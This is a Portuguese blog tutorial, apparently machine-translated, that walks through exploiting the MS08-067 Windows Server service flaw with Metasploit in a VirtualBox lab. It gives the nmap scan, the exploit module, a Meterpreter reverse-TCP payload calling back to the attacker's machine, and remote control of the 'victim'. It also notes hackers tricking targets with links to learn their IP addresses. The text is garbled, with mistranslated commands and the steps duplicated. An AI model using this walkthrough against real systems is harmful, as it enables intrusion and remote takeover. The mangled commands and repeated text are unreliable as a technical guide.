Neste artigo eu estou indo para demonstrar como hackear um computador remoto, explorando a falha de análise no código canonização caminho da Netapi32.dll através do Serviço de Servidor ( CVE-2008-4250 ). Antes de saltar para o processo de exploração real, deixe-me dar mais detalhes sobre esta vulnerabilidade no serviço de Servidor.
Detalhes sobre Vulnerabilidade Server Service (MS08-067):
Serviço Microsoft Windows Server fornece suporte para compartilhamento de recursos, como arquivos e serviços de impressão através da rede.
O serviço do servidor é vulnerável a uma vulnerabilidade de execução de código remoto. A vulnerabilidade é causada devido a um erro no processamento de sequências quando netapi32.dll diretório caráter de travessia em nomes de caminho. Isto pode ser explorado para corromper a memória pilha por exemplo o envio de solicitações RPC contendo nomes de caminho especialmente criadas para o componente de serviço do servidor. O 'NetprPathCanonicalize ()' função no arquivo 'netapi32.dll' é afetado.
Um pedido malicioso para os resultados sistema vulnerável compromisso completa de computadores vulneráveis.
Essa vulnerabilidade afeta o Windows XP, Windows 2000, Windows Server 2003, Windows Vista e Windows Server 2008. Mas Atacantes requerem acesso autenticado no Windows Vista e Server 2008 plataformas para explorar esta questão.
Explorando o MS08-067 usando Metasploit:
Requisitos:
- VirtualBox
- Backtrack 5
- Alvo OS (XP)
Etapa 1:
Criar duas máquina virtual (VM), nomeadamente "Target" e "BT5". Instalar o XP dentro Alvo VM e Backtrack dentro BT5. Inicie os dois VMs.
Se você não sabe como criar máquinas virtuais, então por favor leia este manual VirtualBox .
Passo 2: Encontrar o endereço IP de destino
Abra o prompt de comando na máquina de destino (XP). Digite "ipconfig" para encontrar o endereço IP do sistema Target.
Passo 3: Coleta de Informações
Agora vamos coletar algumas informações sobre a máquina de destino. Para este fim, vamos usar a ferramenta nmap.
Abra o terminal na máquina BT5 (Backtrack) e digite "nmap-O 192.168.56.12". Aqui 192.168.56.12 é o endereço IP da máquina de destino. Se você olhar para o resultado, você pode encontrar a lista de portas abertas e versão OS.
Passo 4: Metasploit
Agora, abra o Terminal na máquina BT5 (Backtrack) e digite "msfconsole".
O msfconsole é a interface mais popular para o Metasploit Framework. Ele fornece um "tudo-em-um" console centralizado e permite acesso eficiente a praticamente todas as opções disponíveis no Metasploit Framework.
Vamos usar o comando de busca para encontrar os módulos de exploração com a NetAPI palavra-chave. Tipo "busca netap i". Agora você pode ver a lista de módulos de combinar com o NetAPI.
Nós vamos explorar MS08-067, assim tipo "uso exploit/windows/smb/ms08_067_netapi".
Passo 5: Carga Set
Como de costume, vamos usar a carga TCP reverso para esta façanha também. Tipo "set payload windows / Meterpreter / reverse_tcp" no msfconsole.
Passo 6: Opções
Tipo "definir LHOST 192.168.56.10". Aqui 192.168.56.10 é o endereço IP da máquina Backtrack. Você pode encontrar o endereço de ip pelo comando 'ifconfig' digitação no Terminal.
Tipo "definir rhost 192.168.56.12". Aqui 192.168.56.12 é o endereço IP da máquina de destino.
Passo 7: Explorando
Ok, é hora de explorar a vulnerabilidade, "proeza" tipo no console. Se a exploração for bem sucedido, você pode ver o seguinte resultado.
Agora podemos controlar o computador remoto usando o Meterpreter. Por exemplo, digitando "screenshot" vai pegar a imagem do sistema da vítima.
Criar duas máquina virtual (VM), nomeadamente "Target" e "BT5". Instalar o XP dentro Alvo VM e Backtrack dentro BT5. Inicie os dois VMs.
Se você não sabe como criar máquinas virtuais, então por favor leia este manual VirtualBox .
Passo 2: Encontrar o endereço IP de destino
Abra o prompt de comando na máquina de destino (XP). Digite "ipconfig" para encontrar o endereço IP do sistema Target.
Hackers usam métodos diferentes para encontrar o endereço IP da vítima. Para por exemplo., Enviando link que irá obter os detalhes ip ou usar o Angry IP Scanner.
Passo 3: Coleta de Informações
Agora vamos coletar algumas informações sobre a máquina de destino. Para este fim, vamos usar a ferramenta nmap.
Abra o terminal na máquina BT5 (Backtrack) e digite "nmap-O 192.168.56.12". Aqui 192.168.56.12 é o endereço IP da máquina de destino. Se você olhar para o resultado, você pode encontrar a lista de portas abertas e versão OS.
Passo 4: Metasploit
Agora, abra o Terminal na máquina BT5 (Backtrack) e digite "msfconsole".
O msfconsole é a interface mais popular para o Metasploit Framework. Ele fornece um "tudo-em-um" console centralizado e permite acesso eficiente a praticamente todas as opções disponíveis no Metasploit Framework.
Vamos usar o comando de busca para encontrar os módulos de exploração com a NetAPI palavra-chave. Tipo "busca netap i". Agora você pode ver a lista de módulos de combinar com o NetAPI.
Nós vamos explorar MS08-067, assim tipo "uso exploit/windows/smb/ms08_067_netapi".
Passo 5: Carga Set
Como de costume, vamos usar a carga TCP reverso para esta façanha também. Tipo "set payload windows / Meterpreter / reverse_tcp" no msfconsole.
Passo 6: Opções
Tipo "definir LHOST 192.168.56.10". Aqui 192.168.56.10 é o endereço IP da máquina Backtrack. Você pode encontrar o endereço de ip pelo comando 'ifconfig' digitação no Terminal.
Tipo "definir rhost 192.168.56.12". Aqui 192.168.56.12 é o endereço IP da máquina de destino.
Passo 7: Explorando
Ok, é hora de explorar a vulnerabilidade, "proeza" tipo no console. Se a exploração for bem sucedido, você pode ver o seguinte resultado.
Agora podemos controlar o computador remoto usando o Meterpreter. Por exemplo, digitando "screenshot" vai pegar a imagem do sistema da vítima.
0 comentários:
Postar um comentário